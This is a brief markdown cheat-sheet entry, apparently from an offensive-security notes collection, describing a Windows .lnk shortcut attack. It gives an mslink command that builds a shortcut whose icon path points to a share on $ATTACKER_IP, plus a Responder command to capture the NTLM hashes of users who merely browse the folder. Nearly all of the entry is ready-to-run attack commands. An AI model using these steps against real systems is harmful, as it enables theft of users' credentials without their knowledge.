# .lnk exploit

* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
* [mamachine's tool](http://mamachine.org/mslink/index.en.html)

* Target does not even have to open the link directly

```sh 
mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
```
* Start a responder and wait for user's hash
```sh
responder -I eth0
```